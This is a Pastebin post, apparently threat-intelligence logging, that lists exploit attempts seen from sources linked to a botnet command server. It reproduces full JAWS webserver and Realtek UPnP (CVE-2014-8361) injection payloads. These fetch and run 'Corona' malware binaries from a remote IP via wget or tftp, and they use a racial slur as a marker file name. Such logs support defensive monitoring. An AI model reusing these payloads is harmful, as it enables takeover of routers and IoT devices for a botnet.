API tools faq
paste
Advertisement
internetweather

Botnet C2 91.209.70.174 – Exploit attempts detected

internetweather
Aug 11th, 2019
884
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.00 KB | None | 0 0
raw download clone embed print report
  1. Source IP Country User Agent Method URI POST_Data Target Port Tag FirstSeen LastSeen Event Count
  2. 167.71.130.93 United States python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.12.2.el7.x86_64 GET /shell?cd%20/tmp;%20echo%20%3ENiGGeR%20%7C%7C%20cd%20/var;%20echo%20%3ENiGGeR;%20cp%20/bin/busybox%20yeet;%20%3Eyeet;%20chmod%20777%20yeet;%20nohup%20wget%20http:/%5C/91.209.70.174:80/Corona.arm4%20-O%20yeet%20%7C%7C%20nohup%20tftp%20-r%20Corona.arm4%20-g%2091.209.70.174%20-l%20yeet;%20chmod%20777%20yeet;./yeet%20jaws;%20rm%20-rf%20yeeter%20%3E/dev/null%202%3E&1 "-" 60001 JAWS Webserver RCE | IoT 2019-08-09T15:06:38Z 2019-08-10T18:38:01Z 290
  3. 167.71.130.93 United States python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.12.2.el7.x86_64 GET /shell?cd%20/tmp;%20echo%20%3ENiGGeR%20%7C%7C%20cd%20/var;%20echo%20%3ENiGGeR;%20cp%20/bin/busybox%20yeet;%20%3Eyeet;%20chmod%20777%20yeet;%20nohup%20wget%20http:/%5C/91.209.70.174:80/Corona.arm7%20-O%20yeet%20%7C%7C%20nohup%20tftp%20-r%20Corona.arm7%20-g%2091.209.70.174%20-l%20yeet;%20chmod%20777%20yeet;./yeet%20jaws;%20rm%20-rf%20yeeter%20%3E/dev/null%202%3E&1 "-" 60001 JAWS Webserver RCE | IoT 2019-08-09T15:06:38Z 2019-08-10T18:38:00Z 296
  4. 165.22.244.168 United States python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.12.2.el7.x86_64 POST /picsdesc.xml "<?xml version=\x221.0\x22 ?><s:Envelope xmlns:s=\x22http://schemas.xmlsoap.org/soap/envelope/\x22 s:encodingStyle=\x22http://schemas.xmlsoap.org/soap/encoding/\x22><s:Body><u:AddPortMapping xmlns:u=\x22urn:schemas-upnp-org:service:WANIPConnection:1\x22><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;wget http://91.209.70.174/Corona.mips`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>" 52869 Realtek RCE | Router | CVE-2014-8361 2019-07-14T07:04:32Z 2019-07-14T07:05:28Z 2
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!